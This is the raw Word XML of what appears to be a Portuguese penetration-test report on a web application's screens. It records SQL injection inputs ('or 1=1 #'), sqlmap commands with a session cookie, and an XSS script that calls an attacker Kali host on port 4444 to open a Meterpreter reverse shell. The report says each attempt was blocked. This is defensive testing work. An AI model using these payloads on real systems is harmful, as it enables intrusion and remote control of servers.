    <w:p w14:paraId="577EE9F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AE257F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1854564D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. A aplicação realizou o tratamento de dados de entrada e não permitiu a injeção de instruções SQL através do campo de “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”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767F7FB7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4539515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58AF502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14:paraId="1EE6384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109BA8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Inserir um texto com uma distribuição adequada de aspa simples e comentários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como entrada no campo “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, a fim de modificar a instrução SQL utilizada pelo sistema para consultar dados referentes a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iap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e usuários cadastrados. Comentários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, como “–“ e “#”, serão utilizados para forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D44E856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79226A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Entradas: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE199F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1000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1 #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DCE65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 w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D34E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C635C9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AE391B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lastRenderedPageBreak/>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A5EF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Espera-se que o sistema realize o tratamento para impedir que os comentários </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>inline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modifiquem a instrução de consulta utilizada pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB089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986872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48FB3F9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. A aplicação realizou o tratamento dos dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C2DFE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414007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630935" w14:textId="521F6B7B" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00D9019E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4.3.4</w:t>
      </w:r>
      <w:r w:rsidR="00A16205"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.5 Tela Consulta Servidor – Exploração via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A16205" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SqlMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="78651BC7" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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E7A637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Tarefa realizada nos dias 19/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E06ED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Duração total das sessões executadas: 3 horas e 30 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B07EB7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9E02BA3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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6E10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Utilizar a ferramenta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para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a partir de injeção de códigos SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1523E16D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C8BCD32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4BAC4A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41D6469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1</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76A1B53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4B2954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Verificar se a tela Consulta Servidor é vulnerável a injeção de código SQL e, caso haja vulnerabilidade, conseguir obter o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42151CD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F00DE8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Para realizar essa sessão de teste, foi necessário utilizar a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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para capturar as informações de cookie contidas no cabeçalho HTTP da requisição no momento em que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a página de Consulta Servidor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é acessada. A Figura 21 mostra os dados obtidos através do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F65497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BBF4594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42E8EB1" wp14:editId="4924F038">
            <wp:extent cx="4486275" cy="1238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3(Editada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E3D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Figura 21 – Parâmetros da página Consulta </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Servidor obtidos através do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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Suite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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E1F0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A991A8B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E9C3FE1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4B7E7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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">./sqlmap.py -u "http://IP_do_servidor/nomeSistema/index.php?pg=servidores" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3F925F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--cookie=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHSESSID=75ce718b37088517cafla733d53c60f" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>db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</w:p>
    <w:p w14:paraId="43DEF2A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B0F7D41" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C45143B" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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-u” especifica a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012611AD" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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“--cookie” especifica um cookie de sessão válido a ser passado para o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durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C80BF3D" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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current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4D4181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>” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62355323" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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2C3521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0A316C4A" w14:textId="7C9EF13E" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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</w:t>
      </w:r>
      <w:r w:rsidR="00E804ED" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pera-se que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E804ED" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a tela de Consulta S</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ervidor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não seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514193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F19288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333B38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017C2E8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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes. Não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141084CC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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C34499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62B99A7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14:paraId="61B28BC2" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A162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9A8877E" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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Repetir a ação da Sessão de teste </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1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e aumentando o nível de heurística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aplicada pel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a injeção de SQL para o valor máximo: 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7162A378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026235C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Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02276880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./</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sqlmap.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py -u "http://IP_do_servidor/nomeSistema/index.php?pg=servidores" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE0B584" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>level 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A05995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9995E55" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC49501" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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-u” especifica a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F953510" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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--cookie” especifica um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A21574B" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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current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4D4181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>” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E9FBB" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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 “--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>level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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” comando utilizado para definir o nível da heurística utilizada no escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE2875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66F46EF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5601245A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a tela Consulta Servidor não seja vulnerável à injeção de SQL e consequentemente não seja possível descobrir o nome do banco de dados utilizado pela aplicação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DC6F42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7A4F34C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E16668E" w14:textId="77777777" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A1620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60C38420" w14:textId="2C69150D" w:rsidR="00A16205" w:rsidRPr="004D4181" w:rsidRDefault="00A16205" w:rsidP="00A16205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O sistema passou nos testes. Mesmo aumentando o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD3109B" w14:textId="77777777" w:rsidR="0030231A" w:rsidRPr="004D4181" w:rsidRDefault="0030231A" w:rsidP="00AC10DC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3530ECFD" w14:textId="2BF8BB41" w:rsidR="008C6DC7" w:rsidRPr="004D4181" w:rsidRDefault="008C6DC7" w:rsidP="006F4C5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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6B128C1D" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5F">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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341AD7" w14:textId="179B0E18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4.3.5.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="004D418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ela Cadastro de Lotes – Exploração via XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF66AB2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167F82B" w14:textId="426E5EF4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arefa realizada dia 2</w:t>
      </w:r>
      <w:r w:rsidR="005178AE" w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA86ABA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: 2 horas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14134AFF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30E1FE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5AA072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14:paraId="40CA00B8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xplorar vulnerabilidade de XSS encontrada na tela Cadastro de Lotes na Iteração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4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208A5B60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6E0451E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14C88889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C2AB454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A partir do browser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ceweasel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a máquina virtual utilizada para testes, abrir uma conexão com a máquina do sistema explorado utilizando um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a ferrament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 Dessa forma, obter acesso ao sistema operacional da máquina que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54DC13" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="331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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8B8B8E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Passos executados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375D1CE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9FE9231" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5F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Através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disponível em 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Multi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>Handler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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">com o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload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windows</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-meterpreter-reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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abrir um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a porta 4444 da máquina virtual utilizada para testes;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B5125" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4C5F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sar um comando GET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abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual utilizada para testes na porta indicada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA4CF22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9AB2B4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Dessa forma, será criado um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para ficar ouvindo conexões. Quando ocorre alguma conexão externa, ele executa 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carregado no </w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">momento, que no caso é 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reverse_tc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utilizado para abrir uma conexão reversa da máquina atacada para a máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A77000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0806E7D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e inicia uma chamada Ajax  do tipo GET par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P_do_kali_linux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na porta 4444 de forma assíncrona. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B9DFB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0888797" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C68ACB" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4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 = new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/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XMLHttpRequest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7468A" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4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r.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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GET",’http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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://IP_do</w:t>
      </w:r>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_kali_linux</w:t>
      </w:r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:4444’,false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EA1033" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C35F0" w14:textId="77777777" w:rsidR="006F4C5F" w:rsidRPr="004D4181" w:rsidRDefault="006F4C5F" w:rsidP="006F4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4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442E27FB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9C0A25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2E201156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que a máquina que hospeda o sistema não permita que a sessão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seja aberta. E consequentemente, não haja acesso ao sistema operacional da máquina que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F45D926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A85687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360C5D1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4D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:strike/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes. O navegador bloqueia a requisição usando o filtro de CORS [6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:strike/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:strike/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="135B6830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Não foi possível realizar o teste com êxito. Pois conforme mostra a Figura 22, o browser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>Iceweasel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> bloqueia a requisição usando o filtro de CORS [6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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>]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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B8BB7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DFC0598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28896" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="06452568" wp14:editId="25B8C80C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>139065</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-3810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="540004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181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figura 22 – Erro exibido no navegador na execução da requisição usando o filtro de CORS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F5164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1923382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0CED554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9DA957D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1A5A90F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B53A92E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14:paraId="538E548D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64E9565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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Repetir os procedimentos realizados na Sessão de teste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, entretanto na máquina virtual de testes utilizar um navegador diferente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ceweasel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, nesse caso o Firefox, para descobrir se o bloqueio da conexão ocorre apenas n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ceweasel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5FC5F3F2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82C63DB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69FF9356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spera-se que a máquina que hospeda o sistema não permita que a sessão d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seja aberta. E consequentemente, não haja acesso ao sistema operacional da máquina que hospeda a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC42EB9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D4138EF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A321ED7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a execução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD5D4CD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strike/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O sistema passou nos testes. Ao utilizar o navegador Firefox, o filtro de CORS impede a conexão</w:t>
      </w:r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2951AD3E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>Não foi possível realizar o teste com êxito. Pois conforme mostra a Figura 23, o browser Firefox bloqueia a requisição usando o filtro de CORS [6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004D4181">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
